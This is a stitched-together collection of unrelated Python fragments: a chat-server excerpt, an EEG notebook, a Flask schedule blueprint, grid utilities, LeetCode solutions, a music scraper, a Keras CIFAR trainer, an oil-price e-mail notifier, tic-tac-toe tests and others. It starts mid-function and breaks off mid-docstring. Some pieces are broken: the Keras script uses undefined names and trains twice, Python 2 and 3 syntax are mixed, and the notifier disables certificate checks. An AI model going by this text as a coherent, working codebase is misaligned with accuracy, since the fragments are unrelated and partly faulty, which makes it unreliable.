            origin.send(b'0')
            return
        if broadcast.username == origin.user.username:
            connections = list(self.connections.get_connections())
            for connection in connections:
                if connection == origin:
                    continue
                # TODO: Might throw exception if the socket was closed already *race*
                connection.send(msg)

    def _handle_accept(self):
        """Accept loop: wrap each new socket in a Connection and track it."""
        while True:
            sock, (ip, port) = self.server.accept()
            connection = Connection(sock)
            self.connections.add(connection)
            print('New client: from {}:{}'.format(ip, port))

    def _handle_data(self):
        """Select loop: dispatch every readable connection."""
        while True:
            # TODO: Might race if not (list)
            socks = list(self.connections.get_socks())
            # TODO: might race login & broadcast messages
            ready_to_read, _, _ = select.select(socks, [], [], Consts.TIMEOUT_SELECT_DATA)
            for sock in ready_to_read:
                connection = self.connections.get(sock)
                self._handle_connection(connection)

    @staticmethod
    def _handle_manage():
        """Console loop: return True when the operator types "exit"."""
        while True:
            choice = input('enter "exit" to terminate')
            if choice == 'exit':
                return True

    def _handle_connection(self, connection):
        """Dispatch one ready connection according to its state."""
        if connection.is_closed():
            connection.close()
            self.connections.remove(connection)
            # BUG FIX: previously fell through and called recv() on the
            # connection that was just closed and removed.
            return
        if connection.state == ConnectionState.UNAUTHENTICATED:
            data = connection.recv()
            msg = data.decode()
            self._connection_login(msg=msg, origin=connection)
        elif connection.state == ConnectionState.BROADCAST:
            data = connection.recv()
            msg = data.decode()
            # TODO: validate this is a valid json
            self._connection_broadcast(msg=msg, origin=connection)
|
#!/usr/bin/env python
# coding: utf-8
# In[2]:
import struct
import socket
import codecs
import time
import matplotlib.pyplot as plt
import pylab
import random
import numpy as np
import sys
import csv
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
import math
import serial
# In[433]:
def ctvepNoise(times):
    """Run *times* rounds of the cVEP noise experiment.

    Each round reads the EEG buffer 4 times, computes a band-power score
    per read, and drives the serial device ('1' above threshold, '0'
    otherwise). Returns the list of all scores.
    NOTE(review): layout reconstructed from a notebook export; the inner
    loop shadows the outer loop variable ``i`` -- confirm intent.
    """
    out = []
    # External device (presumably an Arduino) receiving '1'/'0' commands.
    ser = serial.Serial('/dev/ttyACM4', 9600, timeout=1)
    TP9 = []
    TP10 = []
    AF7 = []
    AF8 = []
    ELECT = []
    allTot = []
    for i in range(times):
        for i in range(4):  # shadows the outer `i`
            time.sleep(4)
            count = 0
            final = []
            nu = 1
            # Text progress bar scaffolding (writes an empty bar as-is).
            toolbar_width = 10
            sys.stdout.write("[%s]" % ("" * toolbar_width))
            sys.stdout.flush()
            sys.stdout.write("\b" * (toolbar_width+1))
            # Latest raw EEG snapshot dumped by the muse server.
            ff = np.load("/home/lukepiette/Documents/museserver/buffer.npy")
            # Power spectral density per channel; [0] is the PSD array.
            TP9 = plt.psd(ff[0],Fs=256,sides="onesided")[0]
            AF7 = plt.psd(ff[1],Fs=256,sides="onesided")[0]
            AF8 = plt.psd(ff[2],Fs=256,sides="onesided")[0]
            TP10 = plt.psd(ff[3],Fs=256,sides="onesided")[0]
            ELECT = plt.psd(ff[4],Fs=256,sides="onesided")[0]
            d = 0
            # Product of band powers in two PSD bins; AF7/AF8 disabled.
            d += (sum(TP9[7:13])*sum(TP9[13:19]))
            #d += (sum(AF7[7:13])*sum(AF7[13:19]))
            #d += (sum(AF8[7:13])*sum(AF8[13:19]))
            d += (sum(TP10[7:13])*sum(TP10[13:19]))
            d += (sum(ELECT[7:13])*sum(ELECT[13:19]))
            d = d/5
            allTot += [d]
            print(d)
            # Threshold decides the signal sent to the serial device.
            if d > 1000:
                ser.write(str.encode('1'))
            else:
                ser.write(str.encode('0'))
            sys.stdout.write("")
        sys.stdout.write("\n")
    ser.close()
    return(allTot)
# In[438]:
# Run 12 trials of the noise experiment and keep the per-trial scores.
score = ctvepNoise(12)
# In[430]:
# Notebook-style cell: display the scores.
score
# In[437]:
# Plot each trial's score against its index.
plt.plot([i for i in range(len(score))],score)
# In[396]:
# Reload the latest raw EEG buffer for manual inspection.
ff = np.load("/home/lukepiette/Documents/museserver/buffer.npy")
# In[399]:
# Size of the PSD array for channel 0.
plt.psd(ff[0],Fs=256,sides="onesided")[0].shape
# In[ ]:
|
#!/usr/bin/env python
'''
Count the number of occurrences in a list
'''
import numpy as np
def count(sequence, item):
    """Return the number of elements of *sequence* equal to *item*.

    Works on any iterable; replaces the index-based loop with a
    generator expression summed at C speed.
    """
    return sum(1 for element in sequence if element == item)
# Demo: count how often the third element occurs in a random list.
alist = [np.random.randint(0,10) for _ in range(25)]
print(count(alist,alist[2]))
def get_num_ecgs_with_feature(json_data, binary_feature_name):
    """Count dataset cases whose doctor's structured diagnosis section
    ("StructuredDiagnosisDoc") has *binary_feature_name* set to True.
    """
    # Iterate the values directly instead of key-indexing, and let sum()
    # do the counting; `is True` preserved from the original (only the
    # boolean True counts, not merely truthy values).
    return sum(
        1
        for case in json_data.values()
        if case["StructuredDiagnosisDoc"][binary_feature_name] is True
    )
def print_diagnosis_distribution(json_data):
    """Print every structured-diagnosis feature with its True-count,
    most frequent first."""
    any_id = next(iter(json_data.keys()))
    feature_names = list(json_data[any_id]["StructuredDiagnosisDoc"].keys())
    counts = {
        name: get_num_ecgs_with_feature(json_data, name)
        for name in feature_names
    }
    for name in sorted(counts, key=counts.get, reverse=True):
        print(name, counts[name])
if __name__ == "__main__":
    # Load the annotated ECG dataset and dump the per-feature True counts.
    from settings import load_json_dset_with_delin
    data = load_json_dset_with_delin()
    print_diagnosis_distribution(data)
from flask import Blueprint, render_template, request, session, url_for
from werkzeug.utils import redirect
import src.models.users.decorators as decorators
from src.models.sked.sked import Sked
sked_blueprint = Blueprint('skeds', __name__)
@sked_blueprint.route('/new', methods=['GET','POST'])
@decorators.requires_login
def add_sked():
    """Create a schedule entry for the logged-in user.

    NOTE(review): after a successful POST this re-renders the add form
    rather than redirecting -- confirm that is intended (PRG pattern).
    """
    if request.method == 'POST':
        name = request.form['name']
        day = request.form['day']
        time = request.form['time']
        # Owner is taken from the session, never from the form.
        sked = Sked(session['email'], day, time, name)
        sked.save()
    return render_template('skeds/add_sked.html')
@sked_blueprint.route('/edit/<string:sked_id>', methods=['GET','POST'])
@decorators.requires_login
def edit_sked(sked_id):
    """Edit an existing schedule entry; redirect to the user's schedule
    list after saving, otherwise show the edit form."""
    sked = Sked.find_by_id(sked_id)
    if request.method == "POST":
        name = request.form['name']
        day = request.form['day']
        time = request.form['time']
        sked.day = day
        sked.time = time
        sked.name = name
        sked.save()
        return redirect(url_for('users.user_sked'))
    return render_template('skeds/edit_sked.html', sked=sked)
@sked_blueprint.route('/delete/<string:sked_id>')
@decorators.requires_login
def delete_sked(sked_id):
    """Delete the given schedule entry, then return to the user's list.

    NOTE(review): no ownership check on sked_id is visible here --
    confirm the decorator or model enforces it.
    """
    Sked.find_by_id(sked_id).delete()
    return redirect(url_for('users.user_sked'))
|
#!/usr/bin/python
import math
def print_map_to_file(d_grid, filename):
    """Write *d_grid* to *filename*, one row per line, bottom row first.

    Occupied (truthy) cells become "1", free cells "0".
    """
    with open(filename, "w+") as grid_file:
        for row in reversed(d_grid):
            for cell in row:
                # Write the flag directly instead of abusing a conditional
                # expression for its side effects.
                grid_file.write("1" if cell else "0")
            grid_file.write("\n")
def create_occupancy_grid(my_map):
    """Convert a map message into a 2-D boolean grid.

    A cell is False when the corresponding map datum is 0 (free) and
    True otherwise (occupied).
    """
    width = my_map.info.width
    # Row-major flattening: datum for (row, col) lives at row*width + col.
    return [
        [my_map.data[row * width + col] != 0 for col in xrange(width)]
        for row in xrange(my_map.info.height)
    ]
def create_d_size_grid(grid, robot_diameter_pixels, regular_grid_height, regular_grid_width):
    """Down-sample *grid* into robot-diameter-sized cells.

    Each output cell is 1 when any pixel of the corresponding
    robot_diameter_pixels x robot_diameter_pixels square is occupied,
    otherwise 0.
    """
    # height = number of rows, width = number of columns.
    n_rows = int(math.floor(regular_grid_height / robot_diameter_pixels))
    n_cols = int(math.floor(regular_grid_width / robot_diameter_pixels))
    d_grid = []
    row_start = 0
    for _ in range(n_rows):
        out_row = []
        column_start = 0
        for _ in range(n_cols):
            occupied = is_square_occupied(
                grid, row_start, column_start,
                row_start + robot_diameter_pixels,
                column_start + robot_diameter_pixels,
                regular_grid_height, regular_grid_width)
            out_row.append(int(occupied))
            column_start += robot_diameter_pixels
        d_grid.append(out_row)
        row_start += robot_diameter_pixels
    return d_grid
def is_square_occupied(grid, row_start, column_start, row_end, column_end, regular_grid_height, regular_grid_width):
    """Return True when any cell of the half-open square
    grid[row_start:row_end][column_start:column_end] is occupied.

    Squares that stick out past the grid bounds are reported as free.
    """
    if row_end >= regular_grid_height or column_end >= regular_grid_width:
        return False
    # any() over a generator replaces the two manual while loops.
    # The `== True` comparison is kept deliberately: grids loaded by
    # load_grid_from_file hold '0'/'1' characters, and the original
    # treats those as unoccupied (only boolean True / 1 matches).
    return any(
        grid[r][c] == True
        for r in range(row_start, row_end)
        for c in range(column_start, column_end)
    )
def create_4D_grid(d_grid):
    """Down-sample *d_grid* by a further factor of 2 in each dimension.

    An output cell is True when any of its four source cells equals 1.
    NOTE(review): Python-2-only -- `len(...) / 2` must be integer
    division for the list allocation to work. The `i + 1` / `j + 1`
    accesses assume even dimensions; odd sizes would raise IndexError.
    """
    d4_grid = [[None] * (len(d_grid[0]) / 2) for i in range(len(d_grid) / 2)]
    d_i, d_j = 0, 0
    for i in range(0, len(d_grid), 2):
        for j in range(0, len(d_grid[i]), 2):
            # occupied: any of the 2x2 source block is 1
            if d_grid[i][j] == 1 or d_grid[i + 1][j] == 1 or d_grid[i][j + 1] == 1 or d_grid[i + 1][j + 1] == 1:
                d4_grid[d_i][d_j] = True
            else: # not occupied
                d4_grid[d_i][d_j] = False
            # Advance the output column; stop this row when full.
            if d_j < len(d4_grid[0]) - 1:
                d_j += 1
            else:
                break
        d_j = 0
        # Advance the output row; stop entirely when the output is full.
        if d_i < len(d4_grid) - 1:
            d_i += 1
        else:
            break
    return d4_grid
def load_grid_from_file(path):
    """Read a grid file (as written by print_map_to_file).

    Returns a list of rows, each row a list of single-character strings
    with newlines stripped -- note cells are characters like "0"/"1",
    not booleans.
    """
    grid = []
    # `with` guarantees the file is closed even if reading fails.
    with open(path, "r") as grid_file:
        for line in grid_file:
            grid.append([char for char in line if char != '\n'])
    return grid
|
from app import db
from app.authenticate import generate_hash,check_passwd
from app.auxiliar import AutoAttributes
class Cadastro(db.Model,AutoAttributes):
    """Credential record: stores a user's hashed password, one row per
    user (usuario_id is unique)."""
    __tablename__ = 'cadastro_usuario'
    id_cadastro = db.Column(db.Integer,primary_key = True)
    # Password hash -- never the plain text (see passwd()).
    senha = db.Column(db.Text, nullable=False)
    usuario_id = db.Column(db.Integer, db.ForeignKey('usuario.id_usuario'),nullable=False,unique=True)
    def passwd(self,passwd):
        """Hash *passwd* and store it as this user's credential."""
        self.senha = generate_hash(passwd)
    def check(self,passwd):
        """Return whether *passwd* matches the stored hash."""
        return check_passwd(passwd,self.senha)
    # Attribute list consumed by the AutoAttributes mixin.
    attrs = ['id_cadastro','usuario_id','senha']
#!/usr/bin/env python
# Function:
# Filename:
import select, socket, queue
class Slectors_server(object):
    """Non-blocking TCP server skeleton (class name is presumably a typo
    of "Selectors"). Only sets up the listening socket; push/pull are
    unimplemented hooks."""
    def __init__(self, HOST):
        # HOST is an (address, port) tuple as accepted by socket.bind.
        self.server = socket.socket()
        self.server.bind(HOST)
        self.server.listen(1000)
        # Non-blocking so the socket can be driven by select/selectors.
        self.server.setblocking(False)
    def push(self, Recv_dict):
        """Hook for outgoing data -- not implemented."""
        pass
    def pull(self, Recv_dict):
        """Hook for incoming data -- not implemented."""
        pass
|
# @Title: 从上到下打印二叉树 III (从上到下打印二叉树 III LCOF)
# @Author: 2464512446@qq.com
# @Date: 2020-06-28 17:17:15
# @Runtime: 40 ms
# @Memory: 13.8 MB
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def levelOrder(self, root: TreeNode) -> List[List[int]]:
        """Zigzag level-order traversal: left-to-right on even levels,
        right-to-left on odd levels."""
        if not root:
            return []
        res = []
        level = [root]
        depth = 0
        # Process one whole level at a time instead of interleaving a
        # work queue with a next-level buffer.
        while level:
            vals = [node.val for node in level]
            res.append(vals if depth % 2 == 0 else vals[::-1])
            depth += 1
            nxt = []
            for node in level:
                if node.left:
                    nxt.append(node.left)
                if node.right:
                    nxt.append(node.right)
            level = nxt
        return res
|
#
# u n c o m m e n t . p y
#
# javascript comments, both /* ... */ and // to eol
#
import sys, re
# Strip JavaScript comments from stdin: marks comment characters as None,
# filters them out, then tidies trailing spaces and blank lines.
# NOTE(review): comment markers inside string literals are also stripped --
# confirm that is acceptable for the intended inputs.
prog = list(sys.stdin.read()) + [None,None,None]   # None padding avoids x+1 overruns
x = 0
while prog[x] != None :
    #print "top of loop:", x, prog[x]
    if prog[x]=='/' and prog[x+1]=='/' :
        # Line comment: blank everything up to (not including) the newline.
        while prog[x] != '\n' :
            if prog[x] == None : break
            prog[x] = None
            x += 1
    elif prog[x]=='/' and prog[x+1]=='*' :
        # Block comment: blank through the closing */.
        while prog[x] != None :
            if prog[x] == '*' and prog[x+1] == '/' :
                prog[x] = prog[x+1] = None
                x += 2
                break
            else :
                # inside old style comment
                prog[x] = None
                x += 1
    else : x += 1 # Actually in code
prog = filter(lambda x: x != None, prog)
prog = "".join(prog)
prog = re.sub(" *\n","\n",prog) # clip trailing spaces
prog = re.sub("\n\n*","\n",prog) # multi empty lines to single
print prog
|
import requests #requests 라이브러리 가져오기
from bs4 import BeautifulSoup #크롤링을 쉽게 해주는 라이브러리
from pprint import pprint
from pymongo import MongoClient # pymongo를 임포트 하기
client = MongoClient('localhost', 27017) # MongoDB listens on port 27017
db = client.dbsparta # use (create) a database named 'dbsparta'
# Fetch the target chart page
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}
data = requests.get('https://www.genie.co.kr/chart/top200?ditc=D&ymd=20200403&hh=23&rtm=N&pg=1',headers=headers)
# Parse the response into a BeautifulSoup tree
soup = BeautifulSoup(data.text, 'html.parser')
# Grab the chart rows with a CSS selector
musics = soup.select('#body-content > div.newest-list > div > table > tbody > tr')
# pprint(musics)
# Loop over the rows (tr elements)
for music in musics:
    # Pull the rank/name/artist/album cells out of each row
    music_rank = music.select_one('td.number')
    music_name = music.select_one('td.info > a')
    music_artist = music.select_one('td.info > a.artist.ellipsis')
    music_album = music.select_one('td.info > a.albumtitle.ellipsis') #class="albumtitle ellipsis"
    rank = music_rank.text.split(" ")[0].strip()
    name = music_name.text.strip()
    artist = music_artist.text.strip()
    album = music_album.text.strip()
    print(rank+" "+name+' -'+artist+' "'+album+'"')
    # doc = {
    #     'rank' : rank,
    #     'name' : name,
    #     'artist' : artist
    # }
    # db.musics.insert_one(doc)
# target_artist = db.musics.find_one({"artist":"아이유 (IU)"})
# target_rank = target_artist["rank"]
# iu_musics = list(db.musics.find({'rank':target_rank}))
# pprint(iu_musics)
import numpy as np
from matplotlib import pyplot
from scipy.misc import toimage
import json
import keras
from keras.datasets import cifar10
from keras.utils import np_utils
from keras.optimizers import SGD
from keras.regularizers import l2, activity_l2
from keras.layers.normalization import BatchNormalization
from keras.models import Sequential
from keras.models import model_from_json
from keras.layers.core import Activation
from keras.layers import Dense
from keras.layers import Dropout
from custom_augmentation import image_alt
#custom csv logger callback
from custom_callbacks.customcalls import CSVHistory
from keras.callbacks import ModelCheckpoint
# ***************\\CHANGE MODEL NAME HERE EVERY RUN//***********************
# **************************************************************************
modelname = "ffn42" #used for logging purposes
# **************************************************************************
seed = 7
np.random.seed(seed)
# load data
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
#normalize images
X_train = X_train.astype("float32")
X_test = X_test.astype("float32")
X_train = X_train / 255.0
X_test = X_test / 255.0
#reshape images to vectors (32x32x3 = 3072 per image)
X_train = np.reshape(X_train, (50000, 3072))
X_test = np.reshape(X_test, (10000, 3072))
# one hot encode outputs
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
num_classes = y_test.shape[1]
train_sub_ind = np.random.choice(X_train.shape[0], 25000, replace = False)
#SUBSET TRAINING SET
#X_train = X_train[train_sub_ind, :]
#y_train = y_train[train_sub_ind, :]
"""
************************LOAD A MODEL FROM JSON*************************
***********************************************************************
with open('./models/ffn19.json', 'rb') as fp:
    saved_model = json.load(fp)
model = model_from_json(saved_model)
"""
#define model: 3 fully-connected ReLU layers of 512 units + softmax output
model = Sequential()
model.add(Dense(512, input_dim=3072))
#model.add(BatchNormalization())
model.add(Activation("relu"))
#model.add(Dropout(0.02))
model.add(Dense(512))
#model.add(BatchNormalization())
model.add(Activation("relu"))
#model.add(Dropout(0.02))
model.add(Dense(512))
#model.add(BatchNormalization())
model.add(Activation("relu"))
#model.add(Dropout(0.02))
model.add(Dense(10))
#model.add(BatchNormalization())
model.add(Activation("softmax"))
# COMPILE: SGD with linear LR decay and Nesterov momentum (adam defined but unused)
epochs = 5
lrate = 0.01
decay = lrate/epochs
sgd = SGD(lr=lrate, decay = decay,momentum = 0.9, nesterov=True)
adam = keras.optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
#CALLBACKS: save the best-by-val_acc weights each epoch
#board = keras.callbacks.TensorBoard(log_dir="logs/" + modelname, histogram_freq=0, write_graph=True, write_images=False)
#csv = CSVHistory("csv_logs/log_ffn_adam.csv", modelname, separator = " , ", append = True)
filepath = modelname + "_" + "{epoch:02d}-{val_acc:.2f}.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, save_weights_only=True, mode='auto')
data_augmentation = True
if not data_augmentation:
    print 'Not using data augmentation.'
    # NOTE(review): `batch_size` is never defined -- this branch raises
    # NameError if data_augmentation is switched off.
    model.fit(X_train, y_train, validation_data=(X_test, y_test), nb_epoch=epochs, batch_size= batch_size, callbacks = [checkpoint])
else:
    print 'Using real-time data augmentation.'
    # this will do preprocessing and realtime data augmentation
    datagen = image_alt.ImageDataGenerator(
        featurewise_center=False, # set input mean to 0 over the dataset
        samplewise_center=False, # set each sample mean to 0
        featurewise_std_normalization=False, # divide inputs by std of the dataset
        samplewise_std_normalization=False, # divide each input by its std
        zca_whitening=False, # apply ZCA whitening
        rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)
        width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)
        height_shift_range=0.1, # randomly shift images vertically (fraction of total height)
        horizontal_flip=True, # randomly flip images
        vertical_flip=False) # randomly flip images
    datagen.fit(X_train)
    # NOTE(review): `board` and `csv` are commented out above, so this
    # callbacks list raises NameError when this branch runs.
    model.fit_generator(datagen.flow(X_train, y_train,
                        batch_size=32),
                        samples_per_epoch=X_train.shape[0],
                        nb_epoch=epochs,
                        validation_data=(X_test, y_test),
                        callbacks = [board, csv])
#FIT
# NOTE(review): this trains the model a second time after the branch above
# -- confirm both training passes are intended.
fit = model.fit(X_train, y_train, validation_data = (X_test, y_test), nb_epoch=epochs, batch_size=32, shuffle = True, callbacks = [checkpoint])
with open("models/" + modelname + ".json", 'wb') as fp:
    json.dump(model.to_json(), fp)
model.save_weights("weights/" + modelname + ".hdf5")
|
import requests
requests.packages.urllib3.disable_warnings()
import sys
# from bs4 import BeautifulSoup
from decimal import Decimal
# import json
# import lxml
import threading
import time
import smtplib
from email.mime.text import MIMEText
from email.header import Header
# Third-party SMTP service configuration
mail_host="smtp.163.com" #SMTP server
mail_user="" #account user name
mail_pass="" #password / auth code
sender=mail_user # message sender
receivers=[''] # message recipients
dir = 'b' # b: buy s: sell
buy = 0.00      # entry price; overwritten from argv in __main__
up = 0.79       # take-profit distance
down = 0.59     # stop-loss distance
timer = {}      # placeholder; replaced by a threading.Timer in getUSoilPrice
def notify(curr = 0.00):
    """Compare the live price *curr* against the entry price and, once a
    take-profit or stop-loss threshold is crossed, cancel the polling
    timer and e-mail a notification.

    curr may arrive as a string (see pickPrice); both prices are
    normalized to 2-decimal floats before comparison.
    """
    global buy
    buy = float(Decimal(buy).quantize(Decimal('0.00')))
    curr = float(Decimal(curr).quantize(Decimal('0.00')))
    space = float(Decimal(curr - buy).quantize(Decimal('0.00')))
    print('')
    curr_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
    print('\033[7;30;46m----实时USoil: ' + str(curr) + '-----' + 'b:' + str(buy) + '--' + 'space:' + str(space) + '-----', curr_time, '\033[0m')
    messageInfo = ''
    # Take-profit: long and price rose by `up`, or short and it fell by `up`.
    if (dir == 'b' and curr >= buy + up) or (dir == 's' and curr <= buy - up):
        timer.cancel()
        print('\033[1;5;31m**买**' + str(buy) + '-' + str(curr),'*****止盈*****\033[0m')
        messageInfo= '通知:' + curr_time + ' US oil ' + str(buy) + '-' + str(curr) + ' 已止盈'
    # Stop-loss: the opposite move beyond the `down` distance.
    if (dir == 'b' and curr <= buy - down) or (dir == 's' and curr >= buy + down):
        timer.cancel()
        print('\033[1;5;31m**卖**' + str(buy) + '-' + str(curr),'*****止盈*****\033[0m')
        messageInfo= '通知:' + curr_time + ' US oil ' + str(buy) + '-' + str(curr) + ' 已止损'
    if messageInfo:
        title = '【US oil】行权通知'
        content = '''
        <html>
        <head></head>
        <body>
        <b>%s</b>
        </body>
        </html>
        '''%(messageInfo)
        # Args: body text, 'html' subtype, 'utf-8' charset.
        message = MIMEText(content, 'html', 'utf-8')
        message['From'] = Header(mail_user) # sender
        message['To'] = Header(receivers[0]) # recipient
        message['Subject'] = Header(title, 'utf-8')
        try:
            smtpObj = smtplib.SMTP()
            smtpObj.connect(mail_host, 25) # 25 is the SMTP port
            smtpObj.login(mail_user,mail_pass)
            smtpObj.sendmail(sender, receivers, message.as_string())
            smtpObj.quit()
            print("邮件发送成功")
        except smtplib.SMTPException as e:
            print("Error: 无法发送邮件", e)
    pass
def pickPrice(str = ''):
    """Extract the current price from the raw oil.js payload and pass it
    on to notify().

    The price is the text between the first '"' and the first ',' of the
    payload's first ';'-separated field.
    NOTE(review): the parameter shadows the builtin ``str``; renaming it
    would change the signature, so it is only flagged here.
    """
    first_field = str.split(';')[0]
    start = first_field.find('"') + 1
    end = first_field.find(',')
    notify(first_field[start:end])
def getUSoilPrice():
    """Poll the oil.js endpoint every 5 seconds and feed the raw payload
    to pickPrice(); network errors are logged and retried on the next tick."""
    global timer
    # Re-arm the poll before the request so a failure still retries.
    timer = threading.Timer(5, getUSoilPrice)
    timer.start()
    url = "https://info.usd-cny.com/data/oil.js"
    # Pretend to be a regular browser.
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36"
    }
    try:
        res = requests.get(url, headers=headers, timeout=10, verify=False)
    except requests.exceptions.ProxyError:
        print("代理出错,正在重试...")
        time.sleep(3)
    except requests.exceptions.ConnectTimeout:
        print("请求超时, 正在重试...")
        time.sleep(3)
    except requests.exceptions.ConnectionError as e:
        # BUG FIX: '...' + e raised TypeError (str + Exception); convert first.
        print('---请求异常--- ' + str(e))
    else:
        if res.status_code == 200:
            res.encoding = 'gbk'
            result_str = res.text
            pickPrice(result_str)
        else:
            print('爬取数据失败')
    pass
def startTask():
    """Announce the entry price and start the polling loop."""
    # BUG FIX: '...' + buy raised TypeError whenever `buy` was numeric
    # (its module-level default is the float 0.00); format instead.
    print('------买入价格:{}, 任务开启!-------'.format(buy))
    getUSoilPrice()
    pass
# Program entry point
if __name__ == "__main__":
    # entry price (kept as a string; notify() normalizes it)
    buy = sys.argv[1]
    # direction: b = buy (long), s = sell (short)
    dir = sys.argv[2]
    startTask()
|
import tensorflow as tf
import numpy as np
from tensorflow.keras import layers
import matplotlib.pyplot as plt
import time
import TTT
# Smoke tests for the TTT.Board API: win detection, piece removal,
# negamax search, logging, and NN input encoding.
board = TTT.Board(3);
# Player 1 fills a line -> has_won() should report 1.
board.place_piece(1, 1, 1);
board.place_piece(1, 0, 1);
board.place_piece(1, 2, 1);
if(1 != board.has_won()):
    print("BOARD WIN ERROR 1")
# Removing a piece from the line must clear the win.
board.remove_piece(1, 1);
if(1 == board.has_won()):
    print("BOARD REMOVE WIN ERRROR")
# Player -1 builds a line of its own.
board.place_piece(2, 0, -1);
board.place_piece(1, 1, -1);
board.place_piece(0, 2, -1);
if(-1 != board.has_won()):
    print("BOARD REPLACE ERROR");
board.remove_piece(0, 2);
board.place_piece(0, 0, -1);
board.place_piece(0, 2, -1)
if(-1 != board.has_won()):
    print("WTF")
board.refresh()
# On an empty 3x3 board, perfect play is a draw: negamax value must be 0.
test_play = board.negamax(1);
if(test_play[0] != 0):
    print("NEGAMAX VALUE ERROR: " + str(test_play[0]))
board.refresh()
test_play = board.negamax(-1);
if(test_play[0] != 0):
    print("NEGAMAX VALUE ERROR: " + str(test_play[0]))
# Self-play with negamax on both sides must never produce a winner.
start = time.time()
start_player = 1;
for i in range(0, 1):
    board.refresh()
    start_player *= -1
    current_player = start_player
    while(not board.has_won() and not board.drawn()):
        best_play = board.negamax(current_player)
        board.place_piece(best_play[1][0], best_play[1][1], current_player)
        current_player *= -1
    if(board.has_won() != 0):
        print("NEGAMAX ERROR!")
end = time.time()
print(end - start)
board.refresh()
# NOTE(review): test_f is never closed -- acceptable for a throwaway
# test script, but confirm.
test_f = open("test_f.dat", 'a')
board.log_to(test_f)
test_move = board.negamax(1);
board.refresh()
# Inspect the one-hot NN input for a small position.
board.place_piece(0, 0, 1)
board.place_piece(1, 2, -1)
board.print()
one_hot_ans = board.get_nn_input(-1)
print(one_hot_ans)
|
#!/usr/bin/env python3
# encoding: utf-8
"""
selection_sort.py
Created by Jakub Konka on 2011-11-01.
Copyright (c) 2011 University of Strathclyde. All rights reserved.
"""
import sys
import random as rnd
def selection_sort(array):
    '''This function implements the standard version of the
    selection sort algorithm.

    Keyword arguments:
    array -- input array of integers

    Return: None (array is sorted in place)
    '''
    n = len(array)
    for i in range(n):
        # Find the index of the smallest element in array[i:].
        min_ind = i
        for j in range(i + 1, n):
            if array[j] < array[min_ind]:
                min_ind = j
        # Idiomatic tuple swap replaces the three-statement temp swap.
        array[i], array[min_ind] = array[min_ind], array[i]
if __name__ == '__main__':
    # Usage: selection_sort.py N -- sort N random ints in [1, 100].
    n = int(sys.argv[1])
    array = [rnd.randint(1,100) for i in range(n)]
    # print("Array before sorting: ", array)
    selection_sort(array)
    # print("Array after sorting: ", array)
|
def sum(num):
    """Print the sum of the integers 0..num inclusive.

    Note: shadows the builtin ``sum`` and prints instead of returning;
    both quirks are kept because the caller relies on them.
    """
    total = 0
    for value in range(num + 1):
        total += value
    print(total)
sum(4)
|
if __name__ == "__main__":
    # For each of n test cases, compare a guess string against the target
    # word position-by-position: "G" for a match, "B" otherwise.
    n = int(input())
    for i in range(n):
        word = list(input())
        guess = list(input())
        # zip truncates to the shorter of the two inputs.
        M = ["G" if w == b else "B" for w, b in zip(word, guess)]
        print("".join(M))
|
'''
Extraire le dosage
La forme galenique
Le volume (nb de gelules)
Calculer l'equivalent traitement
'''
import pandas as pd
import requests
import re
# Query the open-medicaments API for paracetamol products, then derive
# the dosage (normalized to mg) and capsule count per product.
url = "https://www.open-medicaments.fr/api/v1/medicaments?limit=100&query=paracetamol"
jsonData = requests.get(url).json()
#ICS = [f'https://www.open-medicaments.fr/api/v1/medicaments/{elm["codeCIS"]}' for elm in jsonData]
# Does not work in PyCharm?
# for-loop version
ICS = []
for i in range(0,len(jsonData)):
    toAppend = 'https://www.open-medicaments.fr/api/v1/medicaments/'+jsonData[i]['codeCIS']
    ICS.append(toAppend)
print("Liste des liens API :")
print(ICS)
#s = [requests.get(url).json() for url in ICS]
# Fetch the full record for each product.
fiches_completes = []
for url in ICS:
    fiches_completes.append(requests.get(url).json())
print("Request pour chaque JSON complet :")
print(fiches_completes)
# Last number in the pack label is taken as the capsule count.
reg1 = r'(\d+)'
libelles = [medoc["presentations"][0]["libelle"] for medoc in fiches_completes]
gelules = pd.DataFrame({"gelules":[re.findall(reg1,lib)[-1] for lib in libelles]})
print(gelules.head())
df = pd.DataFrame(jsonData)
# Work only on the denomination column.
# Build a new DataFrame from the regex capture groups.
reg = r'([\D]*)(\d+)(.*),(.*)'
serie = df["denomination"]
ds = serie.str.extract(reg)
# Multiplier column: x1000 when the unit is grams, x1 otherwise (mg).
ds["mul"] = 1000
ds["mul"] = ds["mul"].where(ds[2].str.strip()=="g",1)
ds["dosage"] = ds[1].fillna(0).astype(int)*ds["mul"]
ds["nb_gelules"] = gelules
print(ds.head())
"""
一个机器人位于一个 m x n 网格的左上角 (起始点在下图中标记为“Start” )。
机器人每次只能向下或者向右移动一步。机器人试图达到网格的右下角(在下图中标记为“Finish”)。
现在考虑网格中有障碍物。那么从左上角到右下角将会有多少条不同的路径?
网格中的障碍物和空位置分别用 1 和 0 来表示。
示例 1:
输入:obstacleGrid = [[0,0,0],[0,1,0],[0,0,0]]
输出:2
解释:
3x3 网格的正中间有一个障碍物。
从左上角到右下角一共有 2 条不同的路径:
1. 向右 -> 向右 -> 向下 -> 向下
2. 向下 -> 向下 -> 向右 -> 向右
示例 2:
输入:obstacleGrid = [[0,1],[0,0]]
输出:1
提示:
m == obstacleGrid.length
n == obstacleGrid[i].length
1 <= m, n <= 100
obstacleGrid[i][j] 为 0 或 1
Related Topics 数组 动态规划
👍 551 👎 0
"""
def unique_paths_with_obstacles(grid):
    """Count monotone (right/down only) paths from the top-left to the
    bottom-right of *grid*, where 1 marks an obstacle, via dynamic
